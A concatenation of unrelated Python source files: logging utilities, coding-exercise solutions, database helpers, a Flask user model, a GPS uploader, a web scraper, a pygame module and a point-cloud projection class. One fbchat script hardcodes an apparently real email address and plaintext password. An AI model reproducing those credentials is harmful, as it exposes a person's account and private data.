resp = s.readline()
if b'OK' not in resp:
self._log.warning('Authentication failed: {0!r}', resp)
s.send(b'close\n')
s.close()
return
s.send(b'update\n')
resp = s.readline()
if b'updating_db' not in resp:
self._log.warning('Update failed: {0!r}', resp)
s.send(b'close\n')
s.close()
self._log.info('Database updated.')
|
import io
import os
import csv
import typing
import logging
import datetime
import traceback
class InvertedFilter(logging.Filter):
"""Allow all records except those with the given `name`."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def filter(self, record):
if record.name != self.name:
return 1
else:
return 0
class CsvFormatter(logging.Formatter):
"""Format the log output as a csv."""
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.output = io.StringIO()
self.writer = csv.writer(self.output, quoting=csv.QUOTE_ALL)
self.cols = {"name": lambda r: r.name,
"funcName": lambda r: r.funcName,
"levelname": lambda r: r.levelname,
"message": lambda r: r.getMessage(),
"threadName": lambda r: r.threadName,
"filename": lambda r: r.filename,
"lineno": lambda r: r.lineno,
"asctime": lambda r: datetime.datetime.utcfromtimestamp(r.created).strftime('%Y-%m-%d %H:%M:%S'),
"pathname": lambda r: r.pathname,
"exc_info": lambda r: ("{} '{}': {}".format(r.exc_info[0],
r.exc_info[1],
traceback.format_tb(r.exc_info[2]))
if isinstance(r.exc_info, tuple)
else r.exc_info),
"exc_text": lambda r: r.exc_text,
"stack_info": lambda r: r.stack_info}
self.writer.writerow(self.cols.keys())
def format(self, record: logging.LogRecord) -> str:
self.writer.writerow([self.formatCell(f(record)) for f in self.cols.values()])
data = self.output.getvalue()
self.output.truncate(0)
self.output.seek(0)
return data.strip()
def formatCell(self, cell: typing.Any) -> str:
return str(cell).replace("\n", "\\n").replace("\r", "\\r")
def record_factory(name, level, fn, lno, msg, args, exc_info, func=None,
extra=None, sinfo=None) -> logging.LogRecord:
"""Create a record for the given parameters.
This replaces the file name `fn`, the line number `lno` and the functions
name `func` to the ones six entries above in the current stack. This way
this function removes the `log_debug` calls.
Parameters
----------
name : str
The name of the logger used to log the event represented by this
`LogRecord`
level : int
The numeric level of the logging event (one of `logging.DEBUG`,
`logging.INFO` etc.)
pathname : str
This is ignored
lineno : str
This is ignored
msg : str
The event description message, possibly a format string with
placeholders for variable data.
args : any
Variable data to merge into the msg argument to obtain the event
description.
exc_info : str
An exception tuple with the current exception information, or None
if no exception information is available.
func : str
This is ignored
sinfo : str
A text string representing stack information from the base of the stack
in the current thread, up to the logging call.
Returns
-------
LoggingRecord
The logging record
"""
frames = traceback.extract_stack(limit=7)
frame = frames[0]
return logging.LogRecord(name, level, frame.filename, frame.lineno,
msg, args, exc_info, frame.name, sinfo)
__do_log_cache = {}
def do_log(logger: logging.Logger, log_level: int) -> bool:
"""Whether to log the `log_level` to the given `logger` or not.
Parameters
----------
logger : logging.Logger
The logger object
log_level : int
The log level to check
Returns
-------
bool
Whther to do the log or not
"""
global __do_log_cache
if not isinstance(logger, logging.Logger):
return False
if logger.name not in __do_log_cache:
__do_log_cache[logger.name] = {}
if log_level not in __do_log_cache[logger.name]:
from .config import ENABLED_PROGRAM_LOG_LEVELS
__do_log_cache[logger.name][log_level] = (logger.isEnabledFor(log_level) and
log_level in ENABLED_PROGRAM_LOG_LEVELS)
return __do_log_cache[logger.name][log_level]
def clear_do_log_cache() -> None:
"""Clear the `do_log()` cache."""
global __do_log_cache
__do_log_cache = {}
def log_error(logger: logging.Logger, error: Exception,
logging_level: typing.Optional[int]=logging.ERROR) -> None:
"""Log the given exception if the error level is allowed to log for this
logger.
Parameters
----------
logger : logging.Logger
The logger object
error : Exception
The exception to log
loggin_level : int, optional
The level to log for, default: logging.ERROR
"""
if do_log(logger, logging_level):
logger.log(logging_level,
"{}: {}".format(error.__class__.__name__, error),
exc_info=error)
def log_debug(logger: logging.Logger, msg: str, *args,
logging_level: typing.Optional[int]=logging.DEBUG, **kwargs) -> None:
"""Log the given `msg` to the `logger` with the level `logging.DEBUG`.
This is a shorthand for `log()`.
Parameters
----------
logger : logging.Logger
The logger object
msg : str
The message to log
loggin_level : int, optional
The level to log for, default: logging.DEBUG
"""
log(logger, logging_level, msg, *args, **kwargs)
def log_info(logger: logging.Logger, msg: str, *args,
logging_level: typing.Optional[int]=logging.INFO, **kwargs) -> None:
"""Log the given `msg` to the `logger` with the level `logging.INFO`.
This is a shorthand for `log()`.
Parameters
----------
logger : logging.Logger
The logger object
msg : str
The message to log
loggin_level : int, optional
The level to log for, default: logging.INFO
"""
log(logger, logging_level, msg, *args, **kwargs)
def log(logger: logging.Logger, logging_level: typing.Optional[int], msg: str,
*args, **kwargs) -> None:
"""Log the given `msg` to the `logger` if logging is enabled.
All `args` and `kwargs` will be passed to the `logger` instance.
Logging can be disabled on either the logging module or in the `pylo.config`.
The result defines whether to log or not. This result is cached to prevent
walking through logger hierarchies or to import the config module over and
over again.
Changing logging on runtime is not supported.
Parameters
----------
logger : logging.Logger
The logger object
msg : str
The message to log
loggin_level : int, optional
The level to log for, default: logging.DEBUG
"""
if isinstance(logger, logging.Logger) and do_log(logger, logging_level):
logger.log(logging_level, msg, *args, **kwargs)
def get_logger(obj: typing.Union[str, object],
create_msg: typing.Optional[bool]=True,
instance_args: typing.Optional[typing.Sequence]=None,
instance_kwargs: typing.Optional[typing.Mapping]=None) -> logging.Logger:
"""Get the logger for the given object.
Parameters
----------
obj : object or str
The object that requests the logger or a string how to call the logger
create_msg : bool, optional
Whether to write a message to the log that the `obj` is now created,
default: True
instance_args : sequence
The arguments that were used to create the instance
instance_kwargs : sequence
The keyword arguments that were used to create the instance
Returns
-------
logging.Logger
The logger object
"""
if isinstance(obj, str):
classname = obj
else:
classname = obj.__class__.__name__
logger = logging.getLogger("pylo.{}".format(classname))
if create_msg and do_log(logger, logging.DEBUG):
if instance_args is not None:
instance_args = " with args '{}'".format(instance_args)
else:
instance_args = ""
if instance_kwargs is not None:
instance_kwargs = " {} kwargs '{}'".format(
"and" if instance_args != "" else "with",
instance_kwargs)
else:
instance_kwargs = ""
logger.debug("Creating new instance of {}{}{}".format(classname,
instance_args, instance_kwargs))
return logger
def create_handlers() -> typing.Sequence[logging.Handler]:
"""Create the logging handlers to write debug information into the debug
file and the info logs into the output stream.
Use:
```python
>>> logger = logging.getLogger('pylo')
>>> logger.setLevel(logging.DEBUG)
>>> # add the handlers to the logger
>>> for handler in create_handlers():
... logger.addHandler(handler)
```
Returns
-------
sequence of handlers
The handlers to add to the logger
"""
from .config import PROGRAM_LOG_FILE
log_dir = os.path.dirname(PROGRAM_LOG_FILE)
if not os.path.exists(log_dir) or not os.path.isdir(log_dir):
os.makedirs(log_dir, mode=0o660, exist_ok=True)
# create file handler which logs even debug messages
dfm = CsvFormatter()
fh = logging.FileHandler(PROGRAM_LOG_FILE, mode="a+", encoding="utf-8")
fh.setLevel(logging.DEBUG)
fh.setFormatter(dfm)
# exclude from loggings
fh.addFilter(InvertedFilter("pylo.Datatype"))
fh.addFilter(InvertedFilter("pylo.OptionDatatype"))
# create console handler with a higher log level
ifm = logging.Formatter('%(message)s (#%(lineno)d@%(name)s)')
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
ch.setFormatter(ifm)
from .config import ENABLED_PROGRAM_LOG_LEVELS
if logging.DEBUG in ENABLED_PROGRAM_LOG_LEVELS:
print("Logging debug information to {}".format(PROGRAM_LOG_FILE))
return fh, ch |
# print("geeks", end =" ")
# print("geeksforgeeks")
# print("geeks", end ="")
# print("geeksforgeeks")
# 2
# Hacker
# Rank
# Sample Output
# Hce akr
# Rn ak
# s = input("enter the string: ")
# for i in range(len(s)):
# if i % 2 == 0:
# print(s[i], end="")
# for i in range(len(s)):
# if i % 2 != 0:
# print(s[i])
# else:
# print(s[i])
# s = input("enter the string: ")
# # var = ' '
# for i in range(len(s)):
# if i % 2 == 0:
# print(s[i])
# var ="".join(s[i]),
# print(var)
# for i in range(len(s)):
# if i % 2 != 0:
# var ="".join(s[i])
# print(var)
# t= int(input("enter: "))
# for i in t:
# s = input("enter the string: ")
# s = input("enter the string: ")
# var ="".join(s[::2])
# print(var, end=" ")
# var ="".join(s[1::2])
# print(var)
# s = input("enter the string: ")
# print("".join(s[::2]),"".join(s[1::2]))
s = input("enter the string: ")
even = ""
odd = ""
for i,j in enumerate(s):
if i % 2 == 0:
even += j
else:
odd += j
res = f'{even} {odd}'
print(res)
# #hacker rank soltn
# # Enter your code here. Read input from STDIN. Print output to STDOUT
# T = int(input())
# for i in range(T):
# S = input()
# odd_indexed_characters = ''
# even_indexed_characters = ''
# for i,j in enumerate(S):
# if i % 2 == 0:
# odd_indexed_characters += j
# else:
# even_indexed_characters += j
# print(f"{odd_indexed_characters} {even_indexed_characters}")
|
import patchy
from limpyd import fields, database
from limpyd.utils import make_key
from .redis_lock import LuaLock
class Lock(LuaLock):
"""MonkeyPatch of database.Lock to use LuaLock"""
def do_release(self, expected_token):
if isinstance(expected_token, bytes) and \
self.redis.connection_pool.connection_kwargs.get('decode_responses', False):
expected_token = expected_token.decode()
super(Lock, self).do_release(expected_token)
database.Lock = Lock
class FieldLock(Lock):
"""MonkeyPatch of database.Lock to use LuaLock + set blocking_timeout"""
def __init__(self, field, timeout=5, sleep=0.01):
"""
Save the field and create a real lock,, using the correct connection
and a computed lock key based on the names of the field and its model.
"""
self.field = field
self.sub_lock_mode = False
super(FieldLock, self).__init__(
redis=field._model.get_connection(),
name=make_key(field._model._name, 'lock-for-update', field.name),
timeout=timeout,
blocking_timeout=timeout,
sleep=sleep,
)
def _get_already_locked_by_model(self):
"""
A lock is self_locked if already set for the current field+model on the current
thread.
"""
return self.field._model._is_field_locked(self.field)
def _set_already_locked_by_model(self, value):
if value:
self.field._model._mark_field_as_locked(self.field)
else:
self.field._model._unmark_field_as_locked(self.field)
already_locked_by_model = property(_get_already_locked_by_model, _set_already_locked_by_model)
def acquire(self, *args, **kwargs):
"""
Really acquire the lock only if it's not a sub-lock. Then save the
sub-lock status.
"""
if not self.field.lockable:
return True
if self.already_locked_by_model:
self.sub_lock_mode = True
return True
self.already_locked_by_model = True
return super(FieldLock, self).acquire(*args, **kwargs)
def release(self, *args, **kwargs):
"""
Really release the lock only if it's not a sub-lock. Then save the
sub-lock status and mark the model as unlocked.
"""
if not self.field.lockable:
return
if self.sub_lock_mode:
return
super(FieldLock, self).release(*args, **kwargs)
self.already_locked_by_model = self.sub_lock_mode = False
def __exit__(self, *args, **kwargs):
"""
Mark the model as unlocked.
"""
super(FieldLock, self).__exit__(*args, **kwargs)
if not self.field.lockable:
return
if not self.sub_lock_mode:
self.already_locked_by_model = False
fields.FieldLock = FieldLock
# Patch Worker._main_loop to manage ConnectionError on the line ``job._cached_status = job.status.hget()``
# Without this, if an error occurs, the job won't have its final status (job_delayed and others are
# already managed in our subclass)
from limpyd_jobs.workers import Worker
patchy.patch(Worker._main_loop, """\
@@ -426,7 +426,12 @@ def _main_loop(self):
trace = traceback.format_exc()
self.job_error(job, queue, e, trace)
else:
- job._cached_status = job.status.hget()
+ from redis import ConnectionError
+ from gim.core.utils import retry_if_exception
+ @retry_if_exception(ConnectionError)
+ def get_job_status():
+ return job.status.hget()
+ job._cached_status = get_job_status()
if job._cached_status == STATUSES.DELAYED:
self.job_delayed(job, queue)
elif job._cached_status == STATUSES.CANCELED:
""")
|
'''
Author: Darren Daly
Version: 1.0
'''
import mysql.connector
class UseDatabase:
def __init__(self, configuration):
""" Initialisation code which executes the context manager is CREATED. """
self.host = configuration['DB_HOST']
self.user = configuration['DB_USER']
self.password = configuration['DB_PASSWORD']
self.db = configuration['DB']
def __enter__(self):
""" Set-up code which executes BEFORE the body of the with statement. """
self.conn = mysql.connector.connect(host=self.host,
user=self.user,
password=self.password,
database=self.db,)
self.cursor = self.conn.cursor()
return(self.cursor)
def __exit__(self, exc_type, exv_value, exc_traceback):
""" Tear-down code with executes AFTER the body of the with statement. The three extra parameters to __exit__() contain information related to any exception which may have occurred while running the body of the with statement. """
self.cursor.close()
self.conn.commit()
self.conn.close()
|
pnum = [x for x in range(2,100) if all([x%y!=0 for y in range(2,x)])]
print(pnum) |
from app import db
from werkzeug.security import generate_password_hash, check_password_hash
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
nickname = db.Column('nickname', db.String(250), unique=True , index=True)
password = db.Column('password' , db.String(250))
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
try:
return unicode(self.id) # python 2
except NameError:
return str(self.id) # python 3
def __repr__(self):
return '<User %r>' % (self.nickname)
def __init__(self , nickname ,password):
self.nickname = nickname
self.set_password(password)
def set_password(self , password):
self.password = generate_password_hash(password)
def check_password(self , password):
return check_password_hash(self.password , password)
|
import requests
from time import sleep
import serial
import pynmea2
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-host", help="Host URL. E.g: http://192.168.1.8:8080/pi")
args = parser.parse_args()
print('Using host: ',args.host)
port="/dev/ttyAMA0"
ser=serial.Serial(port, baudrate=9600, timeout=0.5)
# dataout = pynmea2.NMEAStreamReader()
while True:
newdata=ser.readline()
if newdata[0:6] == "$GPRMC":
newmsg = pynmea2.parse(newdata.decode('ascii'))
lat = newmsg.latitude
lng = newmsg.longitude
gps = "Latitude=" + str(lat) + ", Longitude=" + str(lng)
print(gps)
r = requests.post(args.host,json={
'lat':lat,
'lng':lng
})
print(r.status_code, r.reason)
sleep(1) |
import requests
from bs4 import BeautifulSoup
def ola():
doubls = 0
saved = 0
all = 0
alert = 0
openfile1 = open('new СAS_487.txt', "r")
openfile2 = open('result_topric2.txt', "w")
openfile3 = open('topric_out2.txt', "w")
Cas_numbers = []
links = []
for line in openfile1:
Cas_numbers.append(line[:-1])
openfile1.close()
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0'
}
for ele in Cas_numbers:
str0 = ''
all += 1
url = 'https://www.tocris.com/search.php?Value=' + ele + '&Type=QuickSearch&SrchdFrom=Header'
r = requests.get(url, headers=headers)
with open('test.html', 'wb') as output_file:
output_file.write(r.text.encode('UTF-8'))
output_file.close()
output_file1 = open('test.html', 'r')
html = output_file1.read()
output_file1.close()
soup = BeautifulSoup(html, 'lxml')
div = soup.find('meta', {'name': "twitter:title"})
if div:
name = div.get('content')
if name[0:5] == "Searc":
openfile3.write(ele)
openfile3.write('\n')
continue
for ele2 in name:
if ele2 != '|':
str0 += str(ele2)
else:
str0 = str0[:-10]
break
div1 = soup.find('link', {'rel': "canonical"})
link = div1.get('href')
fin_str = str(ele) + '\t' + str0 + '\t' + str(link) + '\n'
openfile2.write(fin_str)
print(fin_str)
saved += 1
if link in links:
doubls += 1
openfile3.write(link)
else:
links.append(link)
else:
openfile3.write(ele)
openfile3.write('???')
openfile3.write('\n')
alert += 1
openfile2.close()
openfile3.close()
print(len(links))
print(saved)
print(doubls)
print(alert)
if __name__ == "__main__":
ola()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-26 10:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('admina', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='administrators',
name='name',
field=models.CharField(max_length=50, null=True),
),
]
|
from fbchat import Client
from fbchat.models import *
client = Client("lukas.grasse@uleth.ca", "parkingbot123")
thread_id = '527926877'
#client.sendMessage('hi', thread_id=thread_id, thread_type=ThreadType.USER)
client.sendLocalImage('./test.jpg', message='This is a local image', thread_id=thread_id, thread_type=ThreadType.USER)
|
import functools
import os
from itertools import product
import pygame as pg
from pygame import time
from pygame.color import Color
from pygame.constants import SRCALPHA, BLEND_RGBA_MULT
from pygame.mixer import SoundType
from pygame.surface import Surface
import asset
from config import TILE_WIDTH, TILE_HEIGHT, PLAYER_SPEED, SCREEN_WIDTH, SCREEN_HEIGHT, PLAYER_HEIGHT, PLAYER_WIDTH, \
PLAYER_FRAME_ROTATION, PAINT_POWER
from game_screen import map, lighting
from game_screen.lighting import draw_light_source
PLAYER_FRAME_LENGTH = PLAYER_FRAME_ROTATION // 3
class _state:
x = None
y = None
current_horizontal_cycle = None
current_paint_cycle = None
image = None
remaining_millipixels = 0
last_tick = None
current_dir = 0
paint_level = None
paint_color = None
footstep_sound: SoundType = None
def draw(screen, light_mask):
player_screen_x = SCREEN_WIDTH / 2
player_screen_y = SCREEN_HEIGHT / 2
screen.blit(_state.image, (player_screen_x, player_screen_y))
draw_light_source(light_mask, _state.x + PLAYER_WIDTH // 2,
_state.y + PLAYER_HEIGHT // 2, lighting.player_lightning_radius)
def _valid_position(x, y):
rel_x = x % TILE_WIDTH
rel_y = y % TILE_HEIGHT
return not any(any(t.is_collision(rel_x - dx, rel_y - dy)
for t in map.get_tile(x + dx, y + dy))
for (dx, dy) in product({0, TILE_WIDTH}, {0, TILE_HEIGHT}))
def draw_footstep(sprite):
@functools.lru_cache(maxsize=None)
def get_rotated(sprite, cd):
return pg.transform.rotate(sprite, cd)
rotated_sprite = get_rotated(sprite, _state.current_dir)
rect = rotated_sprite.get_rect()
if _state.paint_level < 1000:
alpha_mask = Surface((rotated_sprite.get_width(), rotated_sprite.get_height()), flags=SRCALPHA)
alpha_mask.fill(Color(255, 255, 255, int(255*_state.paint_level/1000)))
rotated_sprite = rotated_sprite.copy()
rotated_sprite.blit(alpha_mask, (0, 0), special_flags=BLEND_RGBA_MULT)
map.map_surface.blit(rotated_sprite, (_state.x - rect.x // 2,
_state.y + PLAYER_HEIGHT // 2 - rect.y // 2))
FOOTPRINTS = {
'blue': (asset.BFOOTPRINT_LEFT, asset.BFOOTPRINT_RIGHT),
'orange': (asset.OFOOTPRINT_LEFT, asset.OFOOTPRINT_RIGHT),
'green': (asset.GFOOTPRINT_LEFT, asset.GFOOTPRINT_RIGHT)
}
def increment_cycles():
_state.current_horizontal_cycle = (_state.current_horizontal_cycle + 1) % PLAYER_FRAME_ROTATION
_state.current_paint_cycle = (_state.current_paint_cycle + 1) % (24 * 2)
_state.paint_level = max(_state.paint_level - 1, 0)
if _state.paint_level:
fleft, fright = FOOTPRINTS[_state.paint_color]
if _state.current_paint_cycle == 0:
draw_footstep(asset.get_sprite(fleft))
if _state.current_paint_cycle == 24:
draw_footstep(asset.get_sprite(fright))
def add_paint(color):
_state.paint_level = PAINT_POWER
_state.paint_color = color
def handle_keys():
key = pg.key.get_pressed()
dist = 1
new_tick = time.get_ticks()
tick_since_last = new_tick - _state.last_tick
_state.last_tick = new_tick
millipixels = (tick_since_last * PLAYER_SPEED) + _state.remaining_millipixels
pixel_moves = millipixels // 1000
_state.remaining_millipixels = millipixels % 1000
for _ in range(0, pixel_moves):
new_x = _state.x
new_y = _state.y
moving = False
if key[pg.K_DOWN]:
new_y = new_y + dist
_state.image = asset.get_player_sprites()[0][_state.current_horizontal_cycle // PLAYER_FRAME_LENGTH]
moving = True
y_axis = -1
elif key[pg.K_UP]:
new_y = new_y - dist
_state.image = asset.get_player_sprites()[3][_state.current_horizontal_cycle // PLAYER_FRAME_LENGTH]
moving = True
y_axis = 1
else:
y_axis = 0
if _valid_position(new_x, new_y):
_state.x = new_x
_state.y = new_y
else:
new_x = _state.x
new_y = _state.y
if key[pg.K_RIGHT]:
new_x = new_x + dist
_state.image = asset.get_player_sprites()[2][_state.current_horizontal_cycle // PLAYER_FRAME_LENGTH]
moving = True
x_axis = 1
elif key[pg.K_LEFT]:
new_x = new_x - dist
moving = True
_state.image = asset.get_player_sprites()[1][_state.current_horizontal_cycle // PLAYER_FRAME_LENGTH]
x_axis = -1
else:
x_axis = 0
_state.current_dir = {
(-1, 1): 45,
(-1, 0): 90,
(-1, -1): 135,
(0, -1): 180,
(1, -1): 225,
(1, 0): 270,
(1, 1): 315,
(0, 1): 360,
(0, 0): 0
}[x_axis, y_axis]
if _valid_position(new_x, new_y):
_state.x = new_x
_state.y = new_y
if moving:
increment_cycles()
pg.mixer.Channel(1).play(footstep_sound)
def get_x():
return _state.x
def get_y():
return _state.y
def get_pos():
return _state.x, _state.y
def init():
global footstep_sound
footstep_sound = pg.mixer.Sound(os.path.join('assets', 'sfx_footsteps.wav'))
footstep_sound.set_volume(0.02)
_state.x, _state.y = map.initial_room.get_initial_position()
_state.last_tick = time.get_ticks()
_state.current_horizontal_cycle = 0
_state.current_paint_cycle = 0
_state.image = asset.get_player_sprites()[0][0]
_state.paint_level = 0
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Helpers around the extraction of album/track ID's from metadata sources."""
import re
# Spotify IDs consist of 22 alphanumeric characters
# (zero-left-padded base62 representation of randomly generated UUID4)
spotify_id_regex = {
'pattern': r'(^|open\.spotify\.com/{}/)([0-9A-Za-z]{{22}})',
'match_group': 2,
}
deezer_id_regex = {
'pattern': r'(^|deezer\.com/)([a-z]*/)?({}/)?(\d+)',
'match_group': 4,
}
beatport_id_regex = {
'pattern': r'(^|beatport\.com/release/.+/)(\d+)$',
'match_group': 2,
}
# A note on Bandcamp: There is no such thing as a Bandcamp album or artist ID,
# the URL can be used as the identifier. The Bandcamp metadata source plugin
# works that way - https://github.com/snejus/beetcamp. Bandcamp album
# URLs usually look like: https://nameofartist.bandcamp.com/album/nameofalbum
def extract_discogs_id_regex(album_id):
"""Returns the Discogs_id or None."""
# Discogs-IDs are simple integers. In order to avoid confusion with
# other metadata plugins, we only look for very specific formats of the
# input string:
# - plain integer, optionally wrapped in brackets and prefixed by an
# 'r', as this is how discogs displays the release ID on its webpage.
# - legacy url format: discogs.com/<name of release>/release/<id>
# - legacy url short format: discogs.com/release/<id>
# - current url format: discogs.com/release/<id>-<name of release>
# See #291, #4080 and #4085 for the discussions leading up to these
# patterns.
# Regex has been tested here https://regex101.com/r/TOu7kw/1
for pattern in [
r'^\[?r?(?P<id>\d+)\]?$',
r'discogs\.com/release/(?P<id>\d+)-?',
r'discogs\.com/[^/]+/release/(?P<id>\d+)',
]:
match = re.search(pattern, album_id)
if match:
return int(match.group('id'))
return None
|
import pymysql
#连接数据库
db = pymysql.connect(host = 'xxxxx',port = 3306,user = 'root',passwd = '****',database = 'xrhTest',charset = 'utf8')
#获取游标
cursor = db.cursor()
#数据操作
sql = 'select * from tb_stu1;'
cursor.execute(sql)
ret1 = cursor.fetchone() # 取一条
print(ret1)
# cur.execute('INSERT INTO tb_stu1(id,name,sex,birthday) VALUES ( 1,"小明", "男", "2015-11-02");')
##将修改的内容提交到数据库
# db.commit()
#关闭游标和数据库连接
cursor.close()
db.close()
|
# 暴破,超时了
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
max_sum = nums[0]
for i in range(len(nums)):
temp = nums[i]
if temp > max_sum:
max_sum = temp
for j in range(i+1, len(nums)):
temp += nums[j]
if temp > max_sum:
max_sum = temp
return max_sum
# 有更简单的解法
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
if max(nums) < 0:
return max(nums)
global_num, local_num = 0, 0
for num in nums:
local_num = max(0, num + local_num)
global_num = max(local_num, global_num)
return global_num
|
"""
Projection maps store lookup tables (python dictionaries) that link PointIDs in a point cloud with pixelIDs in an image.
They store many : many relationships and can store arbitrarily complicated projections ( perspective, panoramic,
pushbroom etc.). PMaps only store the mapping function; see HyScene for functionality that pushes data between different
data types. PMaps can be saved using io.save( ... ) to avoid expensive computation multiple times in a processing
workflow.
"""
import numpy as np
from scipy.sparse import coo_matrix, csc_matrix, csr_matrix
import hylite
class PMap(object):
"""
A class for storing lookup tables that map between 3-D point clouds and 2-D images.
"""
def __init__(self, xdim, ydim, npoints, cloud=None, image=None):
"""
Create a new (empty) PMap object.
*Arguments*:
- xdim = the width of the associated image in pixels. Used for ravelling indices.
- ydim = the height of the associated image in pixels. Used for ravelling indices.
- points = the number of points that are in this map. Used for ravelling indices.
- cloud = a link to the source cloud, default is None.
- image = a link to the source image, default is None.
"""
self.xdim = xdim # width of the associated image
self.ydim = ydim # height of the associated image
self.npoints = npoints
self.cloud = cloud # store ref to cloud if provided
self.image = image # store ref to image if provided
self.points = [] # points with non-zero references in this matrix
self.pixels = [] # pixels with non-zero references in this matrix
self.data = coo_matrix( (npoints, xdim*ydim), dtype=np.float32 ) # initialise mapping matrix
def _ridx(self, pixel):
"""
Ravel a pixel index tuple to an integer. If an integer is passed to this function
it will be returned directly.
"""
if isinstance(pixel, tuple):
assert len(pixel) == 2, "Error - (x,y) tuples must have length 2."
pixel = np.ravel_multi_index(pixel, dims=(self.xdim, self.ydim), order='F')
assert np.issubdtype(type(pixel), np.integer), "Error - non-integer pixel ID (%s = %s)?" % (
pixel, type(pixel)) # always wear protection
return pixel
def _uidx(self, pixel):
"""
Unravel an integer pixel index to a (x,y) tuple. If a tuple is passed to this function
it will be returned directly.
"""
if np.issubdtype(type(pixel), np.integer):
pixel = np.unravel_index(pixel, (self.xdim, self.ydim), order='F')
elif isinstance(pixel, tuple):
pass
else:
assert np.issubdtype(type(pixel), np.integer), "Error - non-integer pixel ID (%s = %s)?" % (
pixel, type(pixel))
return pixel
def coo(self):
"""
Convert this pmap's internal sparse matrix to coo format.
"""
if not isinstance(self.data, coo_matrix):
self.data = self.data.tocoo()
def csc(self):
"""
Convert this pmap's internal sparse matrix to compressed column format.
"""
if not isinstance(self.data, csc_matrix):
self.data = self.data.tocsc()
def csr(self):
"""
Convert this pmap's internal sparse matrix to compressed row format.
"""
if not isinstance(self.data, csr_matrix):
self.data = self.data.tocsr()
def get_flat(self):
"""
Return three flat arrays that contain all the links in this projection map.
*Returns*:
- points = an (n,) list of point ids.
- pixels = an (n,) list of pixel ids corresponding to the points above.
- z = an (n,) list of distances between each point and corresponding pixel.
"""
self.coo()
return self.data.row, self.data.col, 1/self.data.data # return
def set_flat(self, points, pixels, z ):
"""
Adds links to this pmap from flattened arrays as returned by get_flat( ... ).
*Arguments*:
- points = an (n,) list of point ids.
- pixels = an (n,) list of pixel ids corresponding to the points above.
- z = an (n,) list of distances between each point and corresponding pixel.
"""
# easy!
self.data = coo_matrix( (1/z, (points,pixels)), shape=(self.npoints, self.xdim*self.ydim), dtype=np.float32 )
# also store unique points and pixels
self.points = np.unique( points )
self.pixels = np.unique( pixels )
def set_ppc(self, pp, vis):
"""
Adds links to the pmap based on a projected point coordinates array and a visibility list, as returned by
e.g. proj_persp and proj_pano.
*Arguments*:
- pp = projected point coordinates as returned by e.g. proj_pano.
- vis = point visibilities, as returned by e.g. proj_pano.
"""
# convert to indices
pid = np.argwhere(vis)[:, 0]
pp = pp[vis]
# convert pixel indices to flat indices
pix = np.ravel_multi_index(pp[:,[0,1]].astype(np.int).T, dims=(self.xdim, self.ydim), order='F')
# set data values
self.set_flat( pid, pix, pp[:,2] )
def size(self):
"""
How many relationships are stored in this?
"""
return len( self.data.data )
def point_count(self):
"""
How many points are included in this mapping (i.e. how many points are mapped to pixels?)
"""
return len(self.points)
def pixel_count(self):
"""
How many pixels are included in this mapping?
"""
return len(self.pixels)
def get_depth(self, pixel, point):
"""
Get the distance between a pixel and point pair. Returns
None if there is no mapping between the pixel and the point.
"""
pixel = self._ridx(pixel)
if isinstance(self.data, coo_matrix): # need to change from coo coordiantes
self.csc()
return 1 / self.data[ point, pixel ] # n.b. note that matrix entries are 1 / z
def get_point_index(self, pixel):
"""
Get the index of the closest point in the specified pixel
*Arguments*;
- pixel = the index of the pixel (integer or (x,y) tuple).
*Returns*:
- point = the point index or None if no points are in the specified pixel.
- depth = the distance to this point.
"""
self.csc() # convert to column format
C = self.data[:, self._ridx(pixel)] # get column
return C.nonzero()[0][ np.argmax( C.data ) ], 1 / np.max( C.data ) # return closest point
# n.b. note that matrix entries are 1 / z
def get_point_indices(self, pixel):
"""
Get the indices and depths of all points in the specified pixel.
*Arguments*;
- pixel = the index of the pixel (integer or (x,y) tuple).
*Returns*:
- points = a list of point indices, or [ ] if no points are present.
- depths = a list of associated depths, or [ ] if no points are present.
"""
self.csc() # convert to column format
C = self.data[:, self._ridx(pixel)] # get column
return C.nonzero()[0], 1 / C.data # return indices and depths
def get_pixel_index(self, point):
"""
Get the index of the closest pixel to the specified point.
*Arguments*;
- point = the point index
*Returns*:
- (px, py) = the pixel coordinates, or None if no mapping exists
- depth = the distance to this pixel.
"""
self.csr() # convert to row format
R = self.data[point, :] # get row
return self._uidx( R.nonzero()[1][ np.argmax( R.data ) ] ), 1 / np.max( R.data ) # closest pixel and depth
def get_pixel_indices(self, point):
"""
Get a list of pixel coordinates associated with the specified point.
*Arguments*:
- point = the point index
*Returns*:
- pixels = a list of (n,2) containing pixel coordinates.
- depths = a list of (n,) containing associated distances.
"""
self.csr() # convert to row format
R = self.data[point,:] # get row
return np.array( np.unravel_index(R.nonzero()[1], (self.xdim, self.ydim), order='F')).T, R.data
def get_pixel_depths(self):
"""
Return a (xdim,ydim) array containing the depth to the closest point in each pixel. Pixels with no points
will be given 0 values.
"""
out = (1 / np.max(self.data, axis=0).toarray()).astype(np.float32)
out[np.logical_not(np.isfinite(out))] = 0
return out.reshape(self.xdim,self.ydim,order='F')
def get_point_depths(self):
"""
Return a (npoints,) array containing the depth to the closest pixel from each point. Points with no
pixels will be given 0 values.
"""
out = (1 / np.max(self.data, axis=1).toarray()).astype(np.float32)
out[np.logical_not(np.isfinite(out))] = 0
return out
def points_per_pixel(self):
"""
Calculate how many points are in each pixel.
Returns:
- a HyImage instance containing point counts per pixel.
"""
self.csr() # use row-compressed form
